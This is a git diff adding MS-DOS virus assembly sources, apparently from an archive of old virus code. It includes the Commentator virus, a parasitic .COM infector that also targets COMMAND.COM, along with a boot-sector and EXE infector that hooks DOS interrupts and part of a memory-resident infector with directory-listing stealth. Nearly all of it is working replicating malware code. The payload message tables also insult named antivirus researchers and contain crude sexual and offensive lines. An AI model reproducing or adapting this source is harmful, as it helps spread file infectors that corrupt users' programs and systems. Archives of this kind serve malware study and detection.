AH,40h ; En programma overschrijven + Mov DX,Offset Begin ; met code van het virus + Mov CX,VirLen ; + Int 21h ;------------------ + Mov AH,57h ; Datum van aangesproken file + Mov AL,1 ; weer herstellen + Pop DX ; + Pop CX ; + Int 21h ;------------------ + Mov AH,3Eh ; Sluiten file + Int 21h ;------------------ +Afgelopen: Mov BX,Buf2 ; Sprongvariabelen weer + Mov Source,BX ; op normaal zetten voor + Mov AX,Buf1 ; de Move routine + Mov Sprong,AX ;------------------ + Mov AH,1Ah ; DTA adres weer op normaal + Mov Dx,80h ; zetten en naar de Move + Int 21h ; routine springen + Mov Ah,2Ch + Int 21h + Xor DL,DL + Xchg Dh,Dl + Add Dx,Dx +; And Dx,11111110b + Add Dx,Offset MsgTab + Mov Si,Dx + Mov Dx,Cs:[SI] + Mov AH,9 + Int 21h + Jmp CS:[Sprong] ;------------------ + +Msgtab DW offset Msg1 + DW offset Msg2 + DW offset Msg3 + DW offset Msg4 + DW offset Msg5 + DW offset Msg6 + DW offset Msg7 + DW offset Msg8 + DW offset Msg9 + DW offset Msg10 + DW offset Msg11 + DW offset Msg12 + DW offset Msg13 + DW offset Msg14 + DW offset Msg15 + DW offset Msg16 + DW offset Msg17 + DW offset Msg18 + DW offset Msg19 + DW offset Msg20 + DW offset Msg21 + DW offset Msg22 + DW offset Msg23 + DW offset Msg24 + DW offset Msg25 + DW offset Msg26 + DW offset Msg27 + DW offset Msg28 + DW offset Msg29 + DW offset Msg30 + DW offset Msg31 + DW offset Msg32 + DW offset Msg33 + DW offset Msg34 + DW offset Msg35 + DW offset Msg36 + DW offset Msg37 + DW offset Msg38 + DW offset Msg39 + DW offset Msg40 + DW offset Msg41 + DW offset Msg42 + DW offset Msg43 + DW offset Msg44 + DW offset Msg45 + DW offset Msg46 + DW offset Msg47 + DW offset Msg48 + DW offset Msg49 + DW offset Msg50 + DW offset Msg51 + DW offset Msg52 + DW offset Msg53 + DW offset Msg54 + DW offset Msg55 + DW offset Msg56 + DW offset Msg57 + DW offset Msg58 + DW offset Msg59 + DW offset Msg60 + +Msg1 Db 13,10,'McAfee is a bum-hole',13,10,'$' +Msg2 Db 13,10,'Patricia Hoffman is a virgin',13,10,'$' +Msg3 Db 13,10,'David Grant is a shithead',13,10,'$' +Msg4 Db 13,10,'Jan Terpstra sucks',13,10,'$' +Msg5 Db 13,10,'Vesselin Bontchev is a lamer',13,10,'$' +Msg6 Db 13,10,'Righard Zwienenberg is a cowboy',13,10,'$' +Msg7 Db 13,10,'Greetings to Cracker Jack in Italy',13,10,'$' +Msg8 Db 13,10,'MS-DOS could be programmed better',13,10,'$' +Msg9 Db 13,10,'A virus may not hang, it must replicate!',13,10,'$' +Msg10 Db 13,10,'(C) by Glenn Benton DVRL',13,10,'$' +Msg11 Db 13,10,'HAHAHA you have a virus',13,10,'$' +Msg12 Db 13,10,'Dutch Virus Research Laboratory',13,10,'$' +Msg13 Db 13,10,'Program to big to fit in ass',13,10,'$' +Msg14 Db 13,10,'Another program bites the dust',13,10,'$' +Msg15 Db 13,10,'Havahey! Another Me born to serve',13,10,'$' +Msg16 Db 13,10,'Deicide wasnt that good after all...',13,10,'$' +Msg17 Db 13,10,'DEICIDE, MORGOTH, BREEZE, BROTHER by Glenn Benton',13,10,'$' +Msg18 Db 13,10,'Hey! Gimme some more disks!',13,10,'$' +Msg19 Db 13,10,'Stealth techniques are cool',13,10,'$' +Msg20 Db 13,10,'Encryption is usefull...',13,10,'$' +Msg21 Db 13,10,'Stephanie my lovely girl',13,10,'$' +Msg22 Db 13,10,'FPROT is compiled BASIC',13,10,'$' +Msg23 Db 13,10,'Fuck da police!',13,10,'$' +Msg24 Db 13,10,'Source soon aveable for jokes!',13,10,'$' +Msg25 Db 13,10,'Why dont you play with something else?',13,10,'$' +Msg26 Db 13,10,'Thanks to BORLAND for Turbo Assembler',13,10,'$' +Msg27 Db 13,10,'It is time for NORTON SPEED DISK',13,10,'$' +Msg28 Db 13,10,'Donald duck is a lie...',13,10,'$' +Msg29 Db 13,10,'Why dont you buy me a CHEESEBURGER?',13,10,'$' +Msg30 Db 13,10,'Wim Kok is a COMMUNIST!!!!',13,10,'$' + +Msg31 Db 13,10,'Xabaras could be better',13,10,'$' +Msg32 Db 13,10,'FAT has a nice technique',13,10,'$' +Msg33 Db 13,10,'This virus is not resident!',13,10,'$' +Msg34 Db 13,10,'Nobody like debugging...',13,10,'$' +Msg35 Db 13,10,'60 Messages in here?',13,10,'$' +Msg36 Db 13,10,'Out of worktime',13,10,'$' +Msg37 Db 13,10,'RAM parity error',13,10,'$' +Msg38 Db 13,10,'Insert porn magazine in drive A',13,10,'$' +Msg39 Db 13,10,'Insert tracktor toilet paper in printer',13,10,'$' +Msg40 Db 13,10,'Upload this virus to McAfee, please',13,10,'$' +Msg41 Db 13,10,'HIP-HOP sucks!',13,10,'$' +Msg42 Db 13,10,'Vote for Saddam.',13,10,'$' +Msg43 Db 13,10,'DEAD BY DAWN',13,10,'$' +Msg44 Db 13,10,'NAIL HIM LIKE JESUS!',13,10,'$' +Msg45 Db 13,10,'May I fuck with your wife?',13,10,'$' +Msg46 Db 13,10,'Hey CJ! What abouth a Corporation (I&DVRL)',13,10,'$' +Msg47 Db 13,10,'Thanx to Oliver North for giving me TASM',13,10,'$' +Msg48 Db 13,10,'Do not use drugs, make a virus!',13,10,'$' +Msg49 Db 13,10,'Register this produkt!',13,10,'$' +Msg50 Db 13,10,'This virus is SHAREWARE',13,10,'$' +Msg51 Db 13,10,'You will hate me for this',13,10,'$' +Msg52 Db 13,10,'See the sunny side of life',13,10,'$' +Msg53 Db 13,10,'DAME EDNA IS COOL!',13,10,'$' +Msg54 Db 13,10,'I like the pope, the pope smokes dope!',13,10,'$' +Msg55 Db 13,10,'We like the pope, he gives us his dope!',13,10,'$' +Msg56 Db 13,10,'Are you FLINTSTONED???',13,10,'$' +Msg57 Db 13,10,'How about a game of STRIP-POKER?',13,10,'$' +Msg58 Db 13,10,'FACES OF DEATH!',13,10,'$' +Msg59 Db 13,10,'Just one more message!!!',13,10,'$' +Msg60 Db 13,10,'Spread this like hell!',13,10,'$' + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; All variables are stored in here, like filehandle, date/time, +; search path and various buffers. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + +FH DW 0 +FindPath DB '*.COM',0 + +Buf1 DW 0 +Buf2 DW 0 + +Sprong DW 0 +Source DW 0 + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; This will contain the relocator routine, located at the end of +; the ORIGINAL file. This will tranfer the 1st part of the program +; to it's original place. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +Mover: + Mov DI,Offset Begin ;------------------ + Mov SI,Source ; Verplaatsen van het 1e deel + Mov CX,VirLen-1 ; van het programma, wat achter + Rep Movsb ;------------------ + Pop DI ; Opgeslagen registers weer + Pop SI ; terugzetten op originele + Pop SS ; waarde en springen naar + Pop ES ; het begin van het programma + Pop DS ; (waar nu het virus niet meer + Pop DX ; staat) + Pop CX ; + Pop BX ; + Pop AX ; + Popf ; + Mov BX,100h ; + Jmp BX ;------------------ + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Only the end of the virus is stored in here. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +Einde db 0 + +Code Ends +End Begin + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.comment2.asm b/MSDOS/Virus.MSDOS.Unknown.comment2.asm new file mode 100644 index 00000000..68efded9 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.comment2.asm @@ -0,0 +1,334 @@ +;谀哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Commentator Virus by Glenn... +;媚哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; This will be a Parasytic Non-Resident .COM infector. +; It will also infect COMMAND.COM. +;滥哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +.MODEL TINY + +Public VirLen,MovLen + +Code Segment para 'Code' +Assume Cs:Code,Ds:Code,Es:Code + + Org 100h + +Signature Equ 0DeDeh ; Signature of virus! + +Buff1 Equ 0F100h +Buff2 Equ Buff1+2 +VirLen Equ Offset Einde-Offset Begin +MovLen Equ Offset Einde-Offset Mover +DTA Equ 0F000h +Proggie Equ DTA+1Eh +Lenny Equ DTA+1Ah + +MinLen Equ Virlen ;Minimale lengte te besmetten programma +MaxLen Equ 0EF00h ; Maximale lengte te besmetten programma + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; This part will contain the actual virus code, for searching the +; next victim and infection of it. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + +Begin: + Jmp Short OverSig ; Sprong naar Oversig vanwege kenmerk + DW Signature ; Herkenningsteken virus +Oversig: + Pushf ;------------------ + Push AX ; Alle registers opslaan voor + Push BX ; later gebruik van het programma + Push CX ; + Push DX ; + Push DS ; + Push ES ; + Push SS ; + Push SI ; + Push DI ;------------------ +InfectPart: + Mov AX,Sprong ;------------------ + Mov Buf1,AX ; Spronggegevens bewaren om + Mov BX,Source ; besmette programma te starten + Mov Buf2,BX ;------------------ + Mov AH,1Ah ; DTA area instellen op + Mov DX,DTA ; $DTA area + Int 21h ;------------------ +Vindeerst: Mov AH,4Eh ; Zoeken naar 1e .COM file in directory + Mov Cx,1 ; + Lea DX,FindPath ; + Int 21h ;------------------ + Jnc KijkInfected ; Geen gevonden, goto Afgelopen + Jmp Afgelopen ;------------------ +KijkInfected: + Mov DX,Cs:[Lenny] ;------------------ + Cmp DX,MinLen ; Kijken of programmalengte voldoet + Jb ZoekNext ; aan de eisen van het virus + Cmp DX,MaxLen ; + Ja ZoekNext ;------------------ +On2: Mov AH,3Dh ; Zo ja , file openen en file handle + Mov AL,2 ; opslaan + Mov DX,Proggie ; + Int 21h ; + Mov FH,AX ;------------------ + Mov BX,AX ; + Mov AH,3Fh ; Lezen 1e 4 bytes van een file met + Mov CX,4 ; een mogelijk kenmerk van het virus + Mov DX,Buff1 ; + Int 21h ;------------------ +Sluiten: Mov AH,3Eh ; File weer sluiten + Int 21h ;------------------ + Mov AX,CS:[Buff2] ; Vergelijken inhoud lokatie Buff1+2 + Cmp AX,Signature ; met Signature. Niet gelijk : Zoeken op + Jnz Infect ; morgoth virus. Als bestand al besmet +ZoekNext: + Mov AH,4Fh ;------------------ + Int 21h ; Zoeken naar volgende .COM file + Jnc KijkInfected ; Geen gevonden, goto Afgelopen + Jmp Afgelopen ;------------------ +Infect: + Mov DX,Proggie ; beveiliging weghalen + Mov AH,43h ; + Mov AL,1 ; + Xor CX,Cx + Int 21h ;------------------ + Mov AH,3Dh ; Bestand openen + Mov AL,2 ; + Mov DX,Proggie ; + Int 21h ;------------------ + Mov FH,AX ; Opslaan op stack van + Mov BX,AX ; datum voor later gebruik + Mov AH,57H ; + Mov AL,0 ; + Int 21h ; + Push CX ; + Push DX ;------------------ + Mov AH,3Fh ; Inlezen van eerste deel van het + Mov CX,VirLen+2 ; programma om later terug te + Mov DX,Buff1 ; kunnen plaatsen. + Int 21h ;------------------ + Mov AH,42H ; File Pointer weer naar het + Mov AL,2 ; einde van het programma + Xor CX,CX ; zetten + Xor DX,DX ; + Int 21h ;------------------ + Xor DX,DX ; Bepalen van de variabele sprongen + Add AX,100h ; in het virus (move-routine) + Mov Sprong,AX ; + Add AX,MovLen ; + Mov Source,AX ;------------------ + Mov AH,40H ; Move routine bewaren aan + Mov DX,Offset Mover ; einde van file + Mov CX,MovLen ; + Int 21h ;------------------ + Mov AH,40H ; Eerste deel programma aan- + Mov DX,Buff1 ; voegen na Move routine + Mov CX,VirLen ; + Int 21h ;------------------ + Mov AH,42h ; File Pointer weer naar + Mov AL,0 ; het begin van file + Xor CX,CX ; sturen + Xor DX,DX ; + Int 21h ;------------------ + Mov AH,40h ; En programma overschrijven + Mov DX,Offset Begin ; met code van het virus + Mov CX,VirLen ; + Int 21h ;------------------ + Mov AH,57h ; Datum van aangesproken file + Mov AL,1 ; weer herstellen + Pop DX ; + Pop CX ; + Int 21h ;------------------ + Mov AH,3Eh ; Sluiten file + Int 21h ;------------------ +Afgelopen: Mov BX,Buf2 ; Sprongvariabelen weer + Mov Source,BX ; op normaal zetten voor + Mov AX,Buf1 ; de Move routine + Mov Sprong,AX ;------------------ + Mov AH,1Ah ; DTA adres weer op normaal + Mov Dx,80h ; zetten en naar de Move + Int 21h ; routine springen + Mov Ah,2Ch + Int 21h + Xor DL,DL + Xchg Dh,Dl + Add Dx,Dx +; And Dx,11111110b + Add Dx,Offset MsgTab + Mov Si,Dx + Mov Dx,Cs:[SI] + Mov AH,9 + Int 21h + Jmp CS:[Sprong] ;------------------ + +Msgtab DW offset Msg1 + DW offset Msg2 + DW offset Msg3 + DW offset Msg4 + DW offset Msg5 + DW offset Msg6 + DW offset Msg7 + DW offset Msg8 + DW offset Msg9 + DW offset Msg10 + DW offset Msg11 + DW offset Msg12 + DW offset Msg13 + DW offset Msg14 + DW offset Msg15 + DW offset Msg16 + DW offset Msg17 + DW offset Msg18 + DW offset Msg19 + DW offset Msg20 + DW offset Msg21 + DW offset Msg22 + DW offset Msg23 + DW offset Msg24 + DW offset Msg25 + DW offset Msg26 + DW offset Msg27 + DW offset Msg28 + DW offset Msg29 + DW offset Msg30 + DW offset Msg31 + DW offset Msg32 + DW offset Msg33 + DW offset Msg34 + DW offset Msg35 + DW offset Msg36 + DW offset Msg37 + DW offset Msg38 + DW offset Msg39 + DW offset Msg40 + DW offset Msg41 + DW offset Msg42 + DW offset Msg43 + DW offset Msg44 + DW offset Msg45 + DW offset Msg46 + DW offset Msg47 + DW offset Msg48 + DW offset Msg49 + DW offset Msg50 + DW offset Msg51 + DW offset Msg52 + DW offset Msg53 + DW offset Msg54 + DW offset Msg55 + DW offset Msg56 + DW offset Msg57 + DW offset Msg58 + DW offset Msg59 + DW offset Msg60 + +Msg1 Db 13,10,'Cycle sluts from hell',13,10,'$' +Msg2 Db 13,10,'Virus Mania IV',13,10,'$' +Msg3 Db 13,10,'2 Live Crew is fucking cool',13,10,'$' +Msg4 Db 13,10,'Like Commentator I, HIP-HOP sucks',13,10,'$' +Msg5 Db 13,10,'Dr. Ruth is a first-class lady!',13,10,'$' +Msg6 Db 13,10,'Dont be a wimp, be dead!',13,10,'$' +Msg7 Db 13,10,'This dick was made for laying girls.',13,10,'$' +Msg8 Db 13,10,'No virus entry, just me!',13,10,'$' +Msg9 Db 13,10,'Dont bite it, you horny bitch!',13,10,'$' +Msg10 Db 13,10,'Stroke my keys, oh YES!',13,10,'$' +Msg11 Db 13,10,'Sex Revolution 4000',13,10,'$' +Msg12 Db 13,10,'Buck Rogers is fake',13,10,'$' +Msg13 Db 13,10,'(C) by Glenn Benton',13,10,'$' +Msg14 Db 13,10,'Registration number required',13,10,'$' +Msg15 Db 13,10,'The fly is alive',13,10,'$' +Msg16 Db 13,10,'Dont fuck with me, or I will kick some ass...',13,10,'$' +Msg17 Db 13,10,'Hey, dont hit the keys that hard!',13,10,'$' +Msg18 Db 13,10,'You will feel me...',13,10,'$' +Msg19 Db 13,10,'BEER BEER BEER BEER BEER BEER BEER!!!',13,10,'$' +Msg20 Db 13,10,'YOU HAVE A VIRUS, BWAH AH AH EH EH HEH ARF!',13,10,'$' +Msg21 Db 13,10,'I would alter Michael Jacksons face with my fists...',13,10,'$' +Msg22 Db 13,10,'WIM KOK IS STILL A COMMUNIST!',13,10,'$' +Msg23 Db 13,10,'Welcome to COMMENTATOR II',13,10,'$' +Msg24 Db 13,10,'Commentator I & II released!',13,10,'$' +Msg25 Db 13,10,'Legalize ABORTUS!',13,10,'$' +Msg26 Db 13,10,'Ronald McDonald goes Oude-Pekela!',13,10,'$' +Msg27 Db 13,10,'Source code soon aveable...',13,10,'$' +Msg28 Db 13,10,'Dont use a rubber against this virus!',13,10,'$' +Msg29 Db 13,10,'Swimming holiday in Bangladesh!',13,10,'$' +Msg30 Db 13,10,'Neo Nazis are a pile of shit.',13,10,'$' + +Msg31 Db 13,10,'Virus researchers are a pile of meat on the street.',13,10,'$' +Msg32 Db 13,10,'World Championship Cat-Throwing',13,10,'$' +Msg33 Db 13,10,'Yo Yo Yo Yo Yo Yo Yo, James Brown is DEAD!',13,10,'$' +Msg34 Db 13,10,'Yech, you are reminding me of my mother-in-law...',13,10,'$' +Msg35 Db 13,10,'How is the weather out there?',13,10,'$' +Msg36 Db 13,10,'Indalis is a fat bitch who looks like a glass-bin.',13,10,'$' +Msg37 Db 13,10,'Lubbers should be castrated for a long time ago.',13,10,'$' +Msg38 Db 13,10,'Legalize hookers (at a low prize!)',13,10,'$' +Msg39 Db 13,10,'Fist fucking sounds irrelevant to you, eh?',13,10,'$' +Msg40 Db 13,10,'I will be Back...',13,10,'$' +Msg41 Db 13,10,'Today it is..... JUDGEMENT DAY!!!',13,10,'$' +Msg42 Db 13,10,'Never mind the dog, beware of owner.',13,10,'$' +Msg43 Db 13,10,'You still owe me a CO-PROCESSOR!',13,10,'$' +Msg44 Db 13,10,'Do not drink and drive',13,10,'$' +Msg45 Db 13,10,'Last name ALMIGHTY, first name DICK',13,10,'$' +Msg46 Db 13,10,'Frodo lives!',13,10,'$' +Msg47 Db 13,10,'The leech lives',13,10,'$' +Msg48 Db 13,10,'Hey, Cracker Jack! Nice virus you made!',13,10,'$' +Msg49 Db 13,10,'A depressive Prince Claus looks like fun!',13,10,'$' +Msg50 Db 13,10,'Happy Eastern',13,10,'$' +Msg51 Db 13,10,'Thank god for AIDS',13,10,'$' +Msg52 Db 13,10,'Art is incredible stupid',13,10,'$' +Msg53 Db 13,10,'Out of semen error',13,10,'$' +Msg54 Db 13,10,'Incorrect BEF version',13,10,'$' +Msg55 Db 13,10,'Of je stopt de stekker erin?!?',13,10,'$' +Msg56 Db 13,10,'Jean Claude van Damme kicks ass.',13,10,'$' +Msg57 Db 13,10,'Cannabis expands the mind',13,10,'$' +Msg58 Db 13,10,'What is this memory? EMS XMS LIM HMA UMB?',13,10,'$' +Msg59 Db 13,10,'NOOOOOO NOT AN IBM SYSTEM, PLEASE!!!!!',13,10,'$' +Msg60 Db 13,10,'Dutch Virus Research Laboratory',13,10,'$' + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; All variables are stored in here, like filehandle, date/time, +; search path and various buffers. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 + +FH DW 0 +FindPath DB '*.COM',0 + +Buf1 DW 0 +Buf2 DW 0 + +Sprong DW 0 +Source DW 0 + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; This will contain the relocator routine, located at the end of +; the ORIGINAL file. This will tranfer the 1st part of the program +; to it's original place. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +Mover: + Mov DI,Offset Begin ;------------------ + Mov SI,Source ; Verplaatsen van het 1e deel + Mov CX,VirLen-1 ; van het programma, wat achter + Rep Movsb ;------------------ + Pop DI ; Opgeslagen registers weer + Pop SI ; terugzetten op originele + Pop SS ; waarde en springen naar + Pop ES ; het begin van het programma + Pop DS ; (waar nu het virus niet meer + Pop DX ; staat) + Pop CX ; + Pop BX ; + Pop AX ; + Popf ; + Mov BX,100h ; + Jmp BX ;------------------ + +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; Only the end of the virus is stored in here. +;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +Einde db 0 + +Code Ends +End Begin + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.compiler.asm b/MSDOS/Virus.MSDOS.Unknown.compiler.asm new file mode 100644 index 00000000..e88044ed --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.compiler.asm @@ -0,0 +1,312 @@ + + cut equ offset len-300h + virsize equ offset len-100h + memsize equ (virsize+20h)/16+1 + + xor di,di + mov ds,di + mov ss,di + mov sp,7BF0h + mov si,7C00h + push si + mov ax,3000h + mov es,ax + mov cx,201h + push cx + push cx + rep movsw + pop ax + push cx + mov cl,8 + mov bx,cut + mov dx,80h + int 13h + mov [1Ch*4],offset timer-100h + mov [1Ch*4+2],3000h + pop es + inc cx + pop ax + pop bx + db 0EAh + dw offset jump-100h + dw 3000h + + jump db 0CDh,013h,0EAh,00,07Ch,00,00 + + timer: push ax + push ds + xor ax,ax + mov ds,ax + cmp [84h],ax + jz tmexit + mov ax,[10h] ; int 04h + mov [70h],ax ; int 1Ch + mov ax,[12h] + mov [72h],ax + mov ax,[84h] + mov cs:old-100h,ax + mov ax,[86h] + mov cs:old+2-100h,ax + mov [84h],offset int21-100h + mov [86h],cs + mov ax,[2Fh*4] + mov cs:int2F-100h,ax + mov ax,[2Fh*4+2] + mov cs:int2F+2-100h,ax + tmexit: pop ds + pop ax + iret + + int21: cmp ax,4B00h + jne exit21 + push ax + push bx + push cx + push dx + push ds + push es + push si + push di + mov ah,52h + int 21h + xor si,si + xor di,di + mov ds,es:[bx-2] + mov bx,ds + mov ax,[di+3] + add [di+3],memsize + inc bx + add ax,bx + mov es,ax + push ax + mov ax,es:[di+3] + sub ax,memsize + push ax + mov ax,[di+3] + add ax,bx + mov ds,ax + mov byte ptr [di],5Ah + mov word ptr [di+1],di + pop [di+3] + pop es + push cs + pop ds + mov cx,virsize/2+1 + rep movsw + mov ds,cx + mov [84h],offset res21-100h + mov [86h],es + back: pop di + pop si + pop es + pop ds + pop dx + pop cx + pop bx + pop ax + exit21: db 0EAh + old dw ? + dw ? + + res21: push ax + push bx + push cx + push dx + push ds + push es + push si + push di + cmp ah,3Eh + je close + cmp ah,3Dh + jne back + + open: call driver + xchg ax,bx + jc out + call chexe + jne out + mov cs:len-100h,cx + out: mov ah,3Eh + call driver + jmp back + + close: call chexe + jne back + cmp cx,cs:len-100h + je back + cmp cx,5000 + jb back + push cx + push dx + push cs + pop es + push cs + pop ds + mov ah,3Fh + mov dx,offset buf-100h + mov cx,20h + call driver + mov si,offset buf+0Eh-100h + mov di,offset save-100h + movsw + movsw + lodsw + movsw + movsw + pop dx + pop ax + mov cl,16 + div cx + inc ax + push ax + push ax + mul cx + mov cx,ax + xchg cx,dx + mov ax,4200h + call driver + pop ax + sub ax,[si-10h] + mov [si-2],ax + mov [si-0Ah],ax + mov [si-8],500h + mov [si-4],offset go-100h + pop ax + xor dx,dx + mov cx,20h + push cx + div cx + inc ax + inc ax + mov [si-14h],ax + mov [si-16h],dx + mov ah,40h + mov cx,virsize + xor dx,dx + call driver + call chexe + mov ah,40h + pop cx + mov dx,offset buf-100h + call driver + jmp back + + go: mov bx,es + add bx,10h + add cs:save+6-100h,bx + add bx,cs:save-100h + push bx + push ds + push es + + call cell + test si,si + je exec + cmp word ptr [si+2],0A000h + jb exec + mov ah,2 + push cs + pop es + push cs + pop ds + mov bx,offset buf-100h + mov cl,1 + call doit + xor si,si + mov di,bx + mov cl,cut/2 + rep cmpsw + je exec + inc count-100h + mov ah,3 + mov cl,9 + call doit + xor si,si + mov di,bx + mov cl,cut/2+1 + rep movsw + mov ah,3 + inc cx + call doit + mov bx,cut + mov cl,8 + mov ah,3 + call doit + + exec: pop es + pop ds + pop ss + mov sp,cs:save+2-100h + jmp dword ptr cs:save+4-100h + + chexe: push bx + mov ax,1220h + call dosint + mov bl,es:[di] + mov ax,1216h + call dosint + pop bx + add di,15h + xor ax,ax + stosw + stosw + mov cx,es:[di-8] + mov dx,es:[di-6] + add di,0Fh + mov ax,'XE' + scasw + jne notexe + scasb + clc + notexe: ret + + cell: push ax + push bx + push cx + mov ah,30h + int 21h + xor si,si + xchg ah,al + cmp ax,401h + ja newdos + cmp ax,314h + jb newdos + cmp ax,31Eh + mov si,7B4h + jae newdos + mov si,10A5h + cmp al,10 + je newdos + mov si,1EC9h + newdos: mov ds,cx + pop cx + pop bx + pop ax + ret + + driver: pushf + call dword ptr cs:old-100h + ret + + doit: push ds + call cell + mov ch,0 + mov al,1 + mov dx,80h + pushf + call dword ptr [si] + pop ds + ret + + dosint: pushf + db 9Ah + int2F dw ? + dw ? + ret + + count dw 0 + save dw 4 dup (?) + len label word + buf label word + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.compo.asm b/MSDOS/Virus.MSDOS.Unknown.compo.asm new file mode 100644 index 00000000..d0ec5518 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.compo.asm @@ -0,0 +1,616 @@ +;% You-name-the-bitch % +;哪哪哪哪哪哪哪哪哪哪哪 +.model tiny +.code + org 100h + +pagesize equ (((offset last) - (offset start)) shr 9) + 1 +parasize equ (((offset last) - (offset start)) shr 4) + 1 +bytesize equ (parasize shl 4) +lastpage equ bytesize - (pagesize shl 9) + + +start: + push ds + call install +entry: + jmp restore + +; Information about host program + +orgip dw 020CDh ; Entry point if .exe, +orgcs dw 0 ; if .com first 3 bytes of file. +com db 0FFh ; If .exe com=0 if .com com=FF + +install: + ; Check if already resident + mov ah, 30h ; Get dos version + mov bx, 1009 ; Installation check + int 21h + cmp bx, 9001 ; Is installed? + jne gores + mov bp, sp ; Get delta offset + mov bp, ss:[bp] + ret + +org21: + db 0EAh ; Buffer for original int21 +org21o dw ? +org21s dw ? + +gores: + pop bp + cmp al, 03h ; Check dos version + jb restore + + ; Try to allocate memory +memall: mov ah, 48h ; Allocate memory + mov bx, parasize+3 + int 21h + jnc gohigh + + ; Try to decrease host memory + push es ; Get MCB + mov bx, es + dec bx + mov es, bx + mov bx, es:[03h] ; Get size of memory + sub bx, parasize+4 ; Calculate needed memory + pop es + mov ah, 4Ah ; Decrease memory block + int 21h + jnc memall ; Allocate memory for virus + jmp restore + +gohigh: + ; Move virus to new memory + dec ax ; es to new mcb + mov es, ax + mov word ptr es:[1], 8 ; mark dos as owner + mov di, 10h ; Set es:di to new block + push cs ; Set ds:si to virus code + pop ds + mov si, bp + sub si, 4 ; Adjust for first call + mov cx, bytesize + cld + rep movsb + + ; Install in int21 vector + sub ax, 0Fh ; Adjust for org 100h + mov ds, ax + mov ax, 3521h ; Save int21 vector + int 21h + mov org21o, bx + mov org21s, es + mov ah, 25h ; Set int21 vector + mov dx, offset vector21 + int 21h + + +restore: + ; Restore original program + pop es + push es + cmp byte ptr cs:bp[6], 00h ; Check file type + je restexe + + ; Restore .com program + push es + pop ds + mov di, 100h + push di + mov ax, cs:bp[2] + stosw + mov al, cs:bp[4] + stosb + retf + +restexe: + ; Restore .exe program + pop ax + mov ds, ax + add ax, cs:bp[4] ; relocate cs + add ax, 10h + push ax + mov ax, cs:bp[2] ; get ip + push ax + retf ; Jump to host + + + +vector21: + cmp ah, 30h ; Get dos version? + jne chkexe + cmp bx, 1009 ; Installation check? + jne chkexe + call dos + mov bx, 9001 ; Return residency code + retf 2 +chkexe: + cmp ax, 4B00h ; Load and execute? + jne chkfcb + call infect ; Infect file + jmp chnexit +chkfcb: + cmp ah, 11h ; Find file? + je fcb + cmp ah, 12h ; Find file? + je fcb + + cmp ah, 4Eh ; Find handle? + je fhdl + cmp ah, 4Fh ; Find handle? + jne chnexit +fhdl: call dos + jnc fhdls + retf 2 +fhdls: jmp findhandle + +chnexit: + jmp org21 + + +fcb: +; Called on find first/find next fcb + ; Perform dos call + + call dos + or al, al ; Check if a file was found + jz exist + retf 2 +exist: + push ax + push bx + push cx + push dx + push si + push di + push ds + push es + + mov ax, 6200h ; Get psp + call dos 